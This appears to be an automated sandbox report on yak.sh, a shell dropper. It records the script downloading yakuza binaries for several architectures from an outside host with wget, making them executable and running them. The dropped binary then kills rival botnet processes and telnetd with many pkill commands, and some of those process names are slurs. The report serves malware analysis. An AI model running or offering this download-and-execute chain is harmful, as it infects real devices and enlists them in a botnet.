ea83411bd7b6e5a7364f7b8b9018f0f17f7084aeb58a47736dd80c99cfeac7f1

Analysis

max time kernel
122s
max time network
150s
platform
debian-9_mips
resource
debian9-mipsbe-20240418-en
resource tags

arch:mipsimage:debian9-mipsbe-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
19-10-2024 11:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

yak.sh
Size

1KB
MD5

d38e8407bbc72cbd2057efdd3d8b7a05
SHA1

89e1ebb28cea58b8f9eb728383f8cb565d58518e
SHA256

ea83411bd7b6e5a7364f7b8b9018f0f17f7084aeb58a47736dd80c99cfeac7f1
SHA512

c0a0450a308555a0c3ff52d7d8fc0ce8ff55b9bca8b700cdf87b222b2bfe2ea112de21aa59a8535020b7d4636f64334606494da99e007caecb09ff3ae69589c9

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 13 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
789	chmod
809	chmod
856	chmod
868	chmod
879	chmod
737	chmod
751	chmod
766	chmod
776	chmod
836	chmod
894	chmod
937	chmod
945	chmod

Executes dropped EXE 1 IoCs

ioc	pid	Process
/tmp/yakuza.mips	738	yakuza.mips

Enumerates running processes
Discovers information about currently running processes on the system

Reads CPU attributes 1 TTPs 64 IoCs

discovery

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/388/cmdline	pkill
File opened for reading	/proc/21/status	pkill
File opened for reading	/proc/110/cmdline	pkill
File opened for reading	/proc/671/cmdline	pkill
File opened for reading	/proc/1/cmdline	pkill
File opened for reading	/proc/234/status	pkill
File opened for reading	/proc/72/status	pkill
File opened for reading	/proc/686/status	pkill
File opened for reading	/proc/79/status	pkill
File opened for reading	/proc/674/status	pkill
File opened for reading	/proc/37/status	pkill
File opened for reading	/proc/4/cmdline	pkill
File opened for reading	/proc/8/cmdline	pkill
File opened for reading	/proc/71/status	pkill
File opened for reading	/proc/366/cmdline	pkill
File opened for reading	/proc/686/status	pkill
File opened for reading	/proc/702/cmdline	pkill
File opened for reading	/proc/333/cmdline	pkill
File opened for reading	/proc/6/status	pkill
File opened for reading	/proc/4/cmdline	pkill
File opened for reading	/proc/126/cmdline	pkill
File opened for reading	/proc/14/cmdline	pkill
File opened for reading	/proc/24/cmdline	pkill
File opened for reading	/proc/16/status	pkill
File opened for reading	/proc/20/cmdline	pkill
File opened for reading	/proc/739/cmdline	pkill
File opened for reading	/proc/8/status	pkill
File opened for reading	/proc/6/cmdline	pkill
File opened for reading	/proc/708/cmdline	pkill
File opened for reading	/proc/36/status	pkill
File opened for reading	/proc/332/cmdline	pkill
File opened for reading	/proc/367/status	pkill
File opened for reading	/proc/11/cmdline	pkill
File opened for reading	/proc/234/cmdline	pkill
File opened for reading	/proc/7/cmdline	pkill
File opened for reading	/proc/709/cmdline	pkill
File opened for reading	/proc/674/cmdline	pkill
File opened for reading	/proc/333/status	pkill
File opened for reading	/proc/709/cmdline	pkill
File opened for reading	/proc/388/status	pkill
File opened for reading	/proc/18/status	pkill
File opened for reading	/proc/7/status	pkill
File opened for reading	/proc/872/status	pkill
File opened for reading	/proc/72/cmdline	pkill
File opened for reading	/proc/3/status	pkill
File opened for reading	/proc/709/cmdline	pkill
File opened for reading	/proc/82/cmdline	pkill
File opened for reading	/proc/20/cmdline	pkill
File opened for reading	/proc/5/cmdline	pkill
File opened for reading	/proc/72/cmdline	pkill
File opened for reading	/proc/1036/status	pkill
File opened for reading	/proc/154/cmdline	pkill
File opened for reading	/proc/739/cmdline	pkill
File opened for reading	/proc/705/cmdline	pkill
File opened for reading	/proc/4/cmdline	pkill
File opened for reading	/proc/81/status	pkill
File opened for reading	/proc/18/status	pkill
File opened for reading	/proc/248/status	pkill
File opened for reading	/proc/680/cmdline	pkill
File opened for reading	/proc/383/status	pkill
File opened for reading	/proc/705/cmdline	pkill
File opened for reading	/proc/127/status	pkill
File opened for reading	/proc/175/status	pkill
File opened for reading	/proc/6/cmdline	pkill

System Network Configuration Discovery 1 TTPs 9 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
713	wget
740	rm
744	wget
752	yakuza.mipsel
754	rm
738	yakuza.mips
1105	sh
1106	pkill
1107	busybox

Writes file to tmp directory 13 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/yakuza.sh	wget
File opened for modification	/tmp/yakuza.i586	wget
File opened for modification	/tmp/yakuza.m68k	wget
File opened for modification	/tmp/yakuza.arm4	wget
File opened for modification	/tmp/yakuza.arm7	wget
File opened for modification	/tmp/yakuza.sparc	wget
File opened for modification	/tmp/yakuza.mips	wget
File opened for modification	/tmp/yakuza.mipsel	wget
File opened for modification	/tmp/yakuza.i686	wget
File opened for modification	/tmp/yakuza.ppc	wget
File opened for modification	/tmp/yakuza.arm5	wget
File opened for modification	/tmp/yakuza.x86	wget
File opened for modification	/tmp/yakuza.arm6	wget

/tmp/yak.sh
/tmp/yak.sh
1⤵
PID:710
- /usr/bin/wget
  wget http://pirati.abuser.eu/yakuza.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:713
- /bin/chmod
  chmod +x yakuza.mips
  2⤵
  - File and Directory Permissions Modification
  PID:737
- /tmp/yakuza.mips
  ./yakuza.mips
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:738
- - /bin/sh
    sh -c "pkill -9 902i13 || busybox pkill -9 902i13"
    3⤵
    PID:743
  - - /usr/bin/pkill
      pkill -9 902i13
      4⤵
      Reads CPU attributes
      PID:745
  - - /bin/busybox
      busybox pkill -9 902i13
      4⤵
      PID:747
- - /bin/sh
    sh -c "pkill -9 BzSxLxBxeY || busybox pkill -9 BzSxLxBxeY"
    3⤵
    PID:748
  - - /usr/bin/pkill
      pkill -9 BzSxLxBxeY
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:749
  - - /bin/busybox
      busybox pkill -9 BzSxLxBxeY
      4⤵
      PID:750
- - /bin/sh
    sh -c "pkill -9 HOHO-LUGO7 || busybox pkill -9 HOHO-LUGO7"
    3⤵
    PID:755
  - - /usr/bin/pkill
      pkill -9 HOHO-LUGO7
      4⤵
      Reads CPU attributes
      PID:757
  - - /bin/busybox
      busybox pkill -9 HOHO-LUGO7
      4⤵
      PID:758
- - /bin/sh
    sh -c "pkill -9 HOHO-U79OL || busybox pkill -9 HOHO-U79OL"
    3⤵
    PID:759
  - - /usr/bin/pkill
      pkill -9 HOHO-U79OL
      4⤵
      Reads CPU attributes
      PID:760
  - - /bin/busybox
      busybox pkill -9 HOHO-U79OL
      4⤵
      PID:761
- - /bin/sh
    sh -c "pkill -9 JuYfouyf87 || busybox pkill -9 JuYfouyf87"
    3⤵
    PID:763
  - - /usr/bin/pkill
      pkill -9 JuYfouyf87
      4⤵
      Reads CPU attributes
      PID:764
  - - /bin/busybox
      busybox pkill -9 JuYfouyf87
      4⤵
      PID:765
- - /bin/sh
    sh -c "pkill -9 NiGGeR69xd || busybox pkill -9 NiGGeR69xd"
    3⤵
    PID:771
  - - /usr/bin/pkill
      pkill -9 NiGGeR69xd
      4⤵
      Reads CPU attributes
      PID:772
  - - /bin/busybox
      busybox pkill -9 NiGGeR69xd
      4⤵
      PID:773
- - /bin/sh
    sh -c "pkill -9 SO190Ij1X || busybox pkill -9 SO190Ij1X"
    3⤵
    PID:774
  - - /usr/bin/pkill
      pkill -9 SO190Ij1X
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:775
  - - /bin/busybox
      busybox pkill -9 SO190Ij1X
      4⤵
      PID:779
- - /bin/sh
    sh -c "pkill -9 LOLKIKEEEDDE || busybox pkill -9 LOLKIKEEEDDE"
    3⤵
    PID:782
  - - /usr/bin/pkill
      pkill -9 LOLKIKEEEDDE
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:783
  - - /bin/busybox
      busybox pkill -9 LOLKIKEEEDDE
      4⤵
      PID:784
- - /bin/sh
    sh -c "pkill -9 ekjheory98e || busybox pkill -9 ekjheory98e"
    3⤵
    PID:798
  - - /usr/bin/pkill
      pkill -9 ekjheory98e
      4⤵
      Reads CPU attributes
      PID:799
  - - /bin/busybox
      busybox pkill -9 ekjheory98e
      4⤵
      PID:802
- - /bin/sh
    sh -c "pkill -9 scansh4 || busybox pkill -9 scansh4"
    3⤵
    PID:816
  - - /usr/bin/pkill
      pkill -9 scansh4
      4⤵
      Reads CPU attributes
      PID:817
  - - /bin/busybox
      busybox pkill -9 scansh4
      4⤵
      PID:818
- - /bin/sh
    sh -c "pkill -9 MDMA || busybox pkill -9 MDMA"
    3⤵
    PID:829
  - - /usr/bin/pkill
      pkill -9 MDMA
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:830
  - - /bin/busybox
      busybox pkill -9 MDMA
      4⤵
      PID:831
- - /bin/sh
    sh -c "pkill -9 fdevalvex || busybox pkill -9 fdevalvex"
    3⤵
    PID:847
  - - /usr/bin/pkill
      pkill -9 fdevalvex
      4⤵
      PID:848
  - - /bin/busybox
      busybox pkill -9 fdevalvex
      4⤵
      PID:850
- - /bin/sh
    sh -c "pkill -9 scanspc || busybox pkill -9 scanspc"
    3⤵
    PID:860
  - - /usr/bin/pkill
      pkill -9 scanspc
      4⤵
      PID:861
  - - /bin/busybox
      busybox pkill -9 scanspc
      4⤵
      PID:864
- - /bin/sh
    sh -c "pkill -9 MELTEDNINJAREALZ || busybox pkill -9 MELTEDNINJAREALZ"
    3⤵
    PID:865
  - - /usr/bin/pkill
      pkill -9 MELTEDNINJAREALZ
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:866
  - - /bin/busybox
      busybox pkill -9 MELTEDNINJAREALZ
      4⤵
      PID:867
- - /bin/sh
    sh -c "pkill -9 flexsonskids || busybox pkill -9 flexsonskids"
    3⤵
    PID:871
  - - /usr/bin/pkill
      pkill -9 flexsonskids
      4⤵
      Reads runtime system information
      PID:872
  - - /bin/busybox
      busybox pkill -9 flexsonskids
      4⤵
      PID:874
- - /bin/sh
    sh -c "pkill -9 scanx86 || busybox pkill -9 scanx86"
    3⤵
    PID:876
  - - /usr/bin/pkill
      pkill -9 scanx86
      4⤵
      Reads runtime system information
      PID:877
  - - /bin/busybox
      busybox pkill -9 scanx86
      4⤵
      PID:878
- - /bin/sh
    sh -c "pkill -9 MISAKI-U79OL || busybox pkill -9 MISAKI-U79OL"
    3⤵
    PID:884
  - - /usr/bin/pkill
      pkill -9 MISAKI-U79OL
      4⤵
      PID:885
  - - /bin/busybox
      busybox pkill -9 MISAKI-U79OL
      4⤵
      PID:886
- - /bin/sh
    sh -c "pkill -9 foAxi102kxe || busybox pkill -9 foAxi102kxe"
    3⤵
    PID:889
  - - /usr/bin/pkill
      pkill -9 foAxi102kxe
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:890
  - - /bin/busybox
      busybox pkill -9 foAxi102kxe
      4⤵
      PID:892
- - /bin/sh
    sh -c "pkill -9 swodjwodjwoj || busybox pkill -9 swodjwodjwoj"
    3⤵
    PID:902
  - - /usr/bin/pkill
      pkill -9 swodjwodjwoj
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:903
  - - /bin/busybox
      busybox pkill -9 swodjwodjwoj
      4⤵
      PID:908
- - /bin/sh
    sh -c "pkill -9 MmKiy7f87l || busybox pkill -9 MmKiy7f87l"
    3⤵
    PID:920
  - - /usr/bin/pkill
      pkill -9 MmKiy7f87l
      4⤵
      Reads runtime system information
      PID:921
  - - /bin/busybox
      busybox pkill -9 MmKiy7f87l
      4⤵
      PID:922
- - /bin/sh
    sh -c "pkill -9 freecookiex86 || busybox pkill -9 freecookiex86"
    3⤵
    PID:934
  - - /usr/bin/pkill
      pkill -9 freecookiex86
      4⤵
      Reads CPU attributes
      PID:935
  - - /bin/busybox
      busybox pkill -9 freecookiex86
      4⤵
      PID:936
- - /bin/sh
    sh -c "pkill -9 sysgpu || busybox pkill -9 sysgpu"
    3⤵
    PID:942
  - - /usr/bin/pkill
      pkill -9 sysgpu
      4⤵
      Reads runtime system information
      PID:943
  - - /bin/busybox
      busybox pkill -9 sysgpu
      4⤵
      PID:944
- - /bin/sh
    sh -c "pkill -9 NiGGeR69xd || busybox pkill -9 NiGGeR69xd"
    3⤵
    PID:949
  - - /usr/bin/pkill
      pkill -9 NiGGeR69xd
      4⤵
      PID:950
  - - /bin/busybox
      busybox pkill -9 NiGGeR69xd
      4⤵
      PID:951
- - /bin/sh
    sh -c "pkill -9 frgege || busybox pkill -9 frgege"
    3⤵
    PID:952
  - - /usr/bin/pkill
      pkill -9 frgege
      4⤵
      Reads CPU attributes
      PID:953
  - - /bin/busybox
      busybox pkill -9 frgege
      4⤵
      PID:954
- - /bin/sh
    sh -c "pkill -9 sysupdater || busybox pkill -9 sysupdater"
    3⤵
    PID:955
  - - /usr/bin/pkill
      pkill -9 sysupdater
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:956
  - - /bin/busybox
      busybox pkill -9 sysupdater
      4⤵
      PID:957
- - /bin/sh
    sh -c "pkill -9 0DnAzepd || busybox pkill -9 0DnAzepd"
    3⤵
    PID:958
  - - /usr/bin/pkill
      pkill -9 0DnAzepd
      4⤵
      Reads runtime system information
      PID:959
  - - /bin/busybox
      busybox pkill -9 0DnAzepd
      4⤵
      PID:960
- - /bin/sh
    sh -c "pkill -9 NiGGeRD0nks69 || busybox pkill -9 NiGGeRD0nks69"
    3⤵
    PID:961
  - - /usr/bin/pkill
      pkill -9 NiGGeRD0nks69
      4⤵
      PID:962
  - - /bin/busybox
      busybox pkill -9 NiGGeRD0nks69
      4⤵
      PID:963
- - /bin/sh
    sh -c "pkill -9 frgreu || busybox pkill -9 frgreu"
    3⤵
    PID:964
  - - /usr/bin/pkill
      pkill -9 frgreu
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:965
  - - /bin/busybox
      busybox pkill -9 frgreu
      4⤵
      PID:966
- - /bin/sh
    sh -c "pkill -9 telnetd || busybox pkill -9 telnetd"
    3⤵
    PID:967
  - - /usr/bin/pkill
      pkill -9 telnetd
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:968
  - - /bin/busybox
      busybox pkill -9 telnetd
      4⤵
      PID:969
- - /bin/sh
    sh -c "pkill -9 0x766f6964 || busybox pkill -9 0x766f6964"
    3⤵
    PID:970
  - - /usr/bin/pkill
      pkill -9 0x766f6964
      4⤵
      Reads CPU attributes
      PID:971
  - - /bin/busybox
      busybox pkill -9 0x766f6964
      4⤵
      PID:972
- - /bin/sh
    sh -c "pkill -9 NiGGeRd0nks1337 || busybox pkill -9 NiGGeRd0nks1337"
    3⤵
    PID:973
  - - /usr/bin/pkill
      pkill -9 NiGGeRd0nks1337
      4⤵
      PID:974
  - - /bin/busybox
      busybox pkill -9 NiGGeRd0nks1337
      4⤵
      PID:975
- - /bin/sh
    sh -c "pkill -9 gaft || busybox pkill -9 gaft"
    3⤵
    PID:976
  - - /usr/bin/pkill
      pkill -9 gaft
      4⤵
      Reads CPU attributes
      PID:977
  - - /bin/busybox
      busybox pkill -9 gaft
      4⤵
      PID:978
- - /bin/sh
    sh -c "pkill -9 urasgbsigboa || busybox pkill -9 urasgbsigboa"
    3⤵
    PID:979
  - - /usr/bin/pkill
      pkill -9 urasgbsigboa
      4⤵
      Reads runtime system information
      PID:980
  - - /bin/busybox
      busybox pkill -9 urasgbsigboa
      4⤵
      PID:981
- - /bin/sh
    sh -c "pkill -9 120i3UI49 || busybox pkill -9 120i3UI49"
    3⤵
    PID:982
  - - /usr/bin/pkill
      pkill -9 120i3UI49
      4⤵
      Reads runtime system information
      PID:983
  - - /bin/busybox
      busybox pkill -9 120i3UI49
      4⤵
      PID:984
- - /bin/sh
    sh -c "pkill -9 OaF3 || busybox pkill -9 OaF3"
    3⤵
    PID:985
  - - /usr/bin/pkill
      pkill -9 OaF3
      4⤵
      Reads runtime system information
      PID:986
  - - /bin/busybox
      busybox pkill -9 OaF3
      4⤵
      PID:987
- - /bin/sh
    sh -c "pkill -9 geae || busybox pkill -9 geae"
    3⤵
    PID:988
  - - /usr/bin/pkill
      pkill -9 geae
      4⤵
      PID:989
  - - /bin/busybox
      busybox pkill -9 geae
      4⤵
      PID:990
- - /bin/sh
    sh -c "pkill -9 vaiolmao || busybox pkill -9 vaiolmao"
    3⤵
    PID:991
  - - /usr/bin/pkill
      pkill -9 vaiolmao
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:992
  - - /bin/busybox
      busybox pkill -9 vaiolmao
      4⤵
      PID:993
- - /bin/sh
    sh -c "pkill -9 123123a || busybox pkill -9 123123a"
    3⤵
    PID:994
  - - /usr/bin/pkill
      pkill -9 123123a
      4⤵
      Reads CPU attributes
      PID:995
  - - /bin/busybox
      busybox pkill -9 123123a
      4⤵
      PID:996
- - /bin/sh
    sh -c "pkill -9 Ofurain0n4H34D || busybox pkill -9 Ofurain0n4H34D"
    3⤵
    PID:997
  - - /usr/bin/pkill
      pkill -9 Ofurain0n4H34D
      4⤵
      Reads CPU attributes
      PID:998
  - - /bin/busybox
      busybox pkill -9 Ofurain0n4H34D
      4⤵
      PID:999
- - /bin/sh
    sh -c "pkill -9 ggTrex || busybox pkill -9 ggTrex"
    3⤵
    PID:1000
  - - /usr/bin/pkill
      pkill -9 ggTrex
      4⤵
      Reads CPU attributes
      PID:1001
  - - /bin/busybox
      busybox pkill -9 ggTrex
      4⤵
      PID:1002
- - /bin/sh
    sh -c "pkill -9 wasads || busybox pkill -9 wasads"
    3⤵
    PID:1003
  - - /usr/bin/pkill
      pkill -9 wasads
      4⤵
      Reads runtime system information
      PID:1004
  - - /bin/busybox
      busybox pkill -9 wasads
      4⤵
      PID:1005
- - /bin/sh
    sh -c "pkill -9 1293194hjXD || busybox pkill -9 1293194hjXD"
    3⤵
    PID:1006
  - - /usr/bin/pkill
      pkill -9 1293194hjXD
      4⤵
      Reads CPU attributes
      PID:1007
  - - /bin/busybox
      busybox pkill -9 1293194hjXD
      4⤵
      PID:1008
- - /bin/sh
    sh -c "pkill -9 OthLaLosn || busybox pkill -9 OthLaLosn"
    3⤵
    PID:1009
  - - /usr/bin/pkill
      pkill -9 OthLaLosn
      4⤵
      Reads CPU attributes
      PID:1010
  - - /bin/busybox
      busybox pkill -9 OthLaLosn
      4⤵
      PID:1011
- - /bin/sh
    sh -c "pkill -9 ggt || busybox pkill -9 ggt"
    3⤵
    PID:1012
  - - /usr/bin/pkill
      pkill -9 ggt
      4⤵
      Reads runtime system information
      PID:1013
  - - /bin/busybox
      busybox pkill -9 ggt
      4⤵
      PID:1014
- - /bin/sh
    sh -c "pkill -9 wget-log || busybox pkill -9 wget-log"
    3⤵
    PID:1015
  - - /usr/bin/pkill
      pkill -9 wget-log
      4⤵
      Reads CPU attributes
      PID:1016
  - - /bin/busybox
      busybox pkill -9 wget-log
      4⤵
      PID:1017
- - /bin/sh
    sh -c "pkill -9 1337SoraLOADER || busybox pkill -9 1337SoraLOADER"
    3⤵
    PID:1018
  - - /usr/bin/pkill
      pkill -9 1337SoraLOADER
      4⤵
      PID:1019
  - - /bin/busybox
      busybox pkill -9 1337SoraLOADER
      4⤵
      PID:1020
- - /bin/sh
    sh -c "pkill -9 SAIAKINA || busybox pkill -9 SAIAKINA"
    3⤵
    PID:1021
  - - /usr/bin/pkill
      pkill -9 SAIAKINA
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1022
  - - /bin/busybox
      busybox pkill -9 SAIAKINA
      4⤵
      PID:1023
- - /bin/sh
    sh -c "pkill -9 ggtq || busybox pkill -9 ggtq"
    3⤵
    PID:1024
  - - /usr/bin/pkill
      pkill -9 ggtq
      4⤵
      Reads runtime system information
      PID:1025
  - - /bin/busybox
      busybox pkill -9 ggtq
      4⤵
      PID:1026
- - /bin/sh
    sh -c "pkill -9 1378bfp919GRB1Q2 || busybox pkill -9 1378bfp919GRB1Q2"
    3⤵
    PID:1027
  - - /usr/bin/pkill
      pkill -9 1378bfp919GRB1Q2
      4⤵
      Reads CPU attributes
      PID:1028
  - - /bin/busybox
      busybox pkill -9 1378bfp919GRB1Q2
      4⤵
      PID:1029
- - /bin/sh
    sh -c "pkill -9 SAIAKUSO || busybox pkill -9 SAIAKUSO"
    3⤵
    PID:1030
  - - /usr/bin/pkill
      pkill -9 SAIAKUSO
      4⤵
      Reads CPU attributes
      PID:1031
  - - /bin/busybox
      busybox pkill -9 SAIAKUSO
      4⤵
      PID:1032
- - /bin/sh
    sh -c "pkill -9 ggtr || busybox pkill -9 ggtr"
    3⤵
    PID:1033
  - - /usr/bin/pkill
      pkill -9 ggtr
      4⤵
      Reads CPU attributes
      PID:1034
  - - /bin/busybox
      busybox pkill -9 ggtr
      4⤵
      PID:1035
- - /bin/sh
    sh -c "pkill -9 14Fa || busybox pkill -9 14Fa"
    3⤵
    PID:1036
  - - /usr/bin/pkill
      pkill -9 14Fa
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1037
  - - /bin/busybox
      busybox pkill -9 14Fa
      4⤵
      PID:1038
- - /bin/sh
    sh -c "pkill -9 SEXSLAVE1337 || busybox pkill -9 SEXSLAVE1337"
    3⤵
    PID:1039
  - - /usr/bin/pkill
      pkill -9 SEXSLAVE1337
      4⤵
      Reads runtime system information
      PID:1040
  - - /bin/busybox
      busybox pkill -9 SEXSLAVE1337
      4⤵
      PID:1041
- - /bin/sh
    sh -c "pkill -9 ggtt || busybox pkill -9 ggtt"
    3⤵
    PID:1042
  - - /usr/bin/pkill
      pkill -9 ggtt
      4⤵
      PID:1043
  - - /bin/busybox
      busybox pkill -9 ggtt
      4⤵
      PID:1044
- - /bin/sh
    sh -c "pkill -9 1902a3u912u3u4 || busybox pkill -9 1902a3u912u3u4"
    3⤵
    PID:1045
  - - /usr/bin/pkill
      pkill -9 1902a3u912u3u4
      4⤵
      PID:1046
  - - /bin/busybox
      busybox pkill -9 1902a3u912u3u4
      4⤵
      PID:1047
- - /bin/sh
    sh -c "pkill -9 SO190Ij1X || busybox pkill -9 SO190Ij1X"
    3⤵
    PID:1048
  - - /usr/bin/pkill
      pkill -9 SO190Ij1X
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1049
  - - /bin/busybox
      busybox pkill -9 SO190Ij1X
      4⤵
      PID:1050
- - /bin/sh
    sh -c "pkill -9 haetrghbr || busybox pkill -9 haetrghbr"
    3⤵
    PID:1051
  - - /usr/bin/pkill
      pkill -9 haetrghbr
      4⤵
      Reads CPU attributes
      PID:1052
  - - /bin/busybox
      busybox pkill -9 haetrghbr
      4⤵
      PID:1053
- - /bin/sh
    sh -c "pkill -9 19ju3d || busybox pkill -9 19ju3d"
    3⤵
    PID:1054
  - - /usr/bin/pkill
      pkill -9 19ju3d
      4⤵
      Reads CPU attributes
      PID:1055
  - - /bin/busybox
      busybox pkill -9 19ju3d
      4⤵
      PID:1056
- - /bin/sh
    sh -c "pkill -9 SORAojkf120 || busybox pkill -9 SORAojkf120"
    3⤵
    PID:1057
  - - /usr/bin/pkill
      pkill -9 SORAojkf120
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1058
  - - /bin/busybox
      busybox pkill -9 SORAojkf120
      4⤵
      PID:1059
- - /bin/sh
    sh -c "pkill -9 hehahejeje92 || busybox pkill -9 hehahejeje92"
    3⤵
    PID:1060
  - - /usr/bin/pkill
      pkill -9 hehahejeje92
      4⤵
      Reads runtime system information
      PID:1061
  - - /bin/busybox
      busybox pkill -9 hehahejeje92
      4⤵
      PID:1062
- - /bin/sh
    sh -c "pkill -9 2U2JDJA901F91 || busybox pkill -9 2U2JDJA901F91"
    3⤵
    PID:1063
  - - /usr/bin/pkill
      pkill -9 2U2JDJA901F91
      4⤵
      PID:1064
  - - /bin/busybox
      busybox pkill -9 2U2JDJA901F91
      4⤵
      PID:1065
- - /bin/sh
    sh -c "pkill -9 SlaVLav12 || busybox pkill -9 SlaVLav12"
    3⤵
    PID:1066
  - - /usr/bin/pkill
      pkill -9 SlaVLav12
      4⤵
      Reads runtime system information
      PID:1067
  - - /bin/busybox
      busybox pkill -9 SlaVLav12
      4⤵
      PID:1068
- - /bin/sh
    sh -c "pkill -9 helpmedaddthhhhh || busybox pkill -9 helpmedaddthhhhh"
    3⤵
    PID:1069
  - - /usr/bin/pkill
      pkill -9 helpmedaddthhhhh
      4⤵
      PID:1070
  - - /bin/busybox
      busybox pkill -9 helpmedaddthhhhh
      4⤵
      PID:1071
- - /bin/sh
    sh -c "pkill -9 2wgg9qphbq || busybox pkill -9 2wgg9qphbq"
    3⤵
    PID:1072
  - - /usr/bin/pkill
      pkill -9 2wgg9qphbq
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1073
  - - /bin/busybox
      busybox pkill -9 2wgg9qphbq
      4⤵
      PID:1074
- - /bin/sh
    sh -c "pkill -9 Slav3Th3seD3vices || busybox pkill -9 Slav3Th3seD3vices"
    3⤵
    PID:1075
  - - /usr/bin/pkill
      pkill -9 Slav3Th3seD3vices
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1076
  - - /bin/busybox
      busybox pkill -9 Slav3Th3seD3vices
      4⤵
      PID:1077
- - /bin/sh
    sh -c "pkill -9 hzSmYZjYMQ || busybox pkill -9 hzSmYZjYMQ"
    3⤵
    PID:1078
  - - /usr/bin/pkill
      pkill -9 hzSmYZjYMQ
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1079
  - - /bin/busybox
      busybox pkill -9 hzSmYZjYMQ
      4⤵
      PID:1080
- - /bin/sh
    sh -c "pkill -9 5Gbf || busybox pkill -9 5Gbf"
    3⤵
    PID:1081
  - - /usr/bin/pkill
      pkill -9 5Gbf
      4⤵
      Reads CPU attributes
      PID:1082
  - - /bin/busybox
      busybox pkill -9 5Gbf
      4⤵
      PID:1083
- - /bin/sh
    sh -c "pkill -9 SoRAxD123LOL || busybox pkill -9 SoRAxD123LOL"
    3⤵
    PID:1084
  - - /usr/bin/pkill
      pkill -9 SoRAxD123LOL
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1085
  - - /bin/busybox
      busybox pkill -9 SoRAxD123LOL
      4⤵
      PID:1086
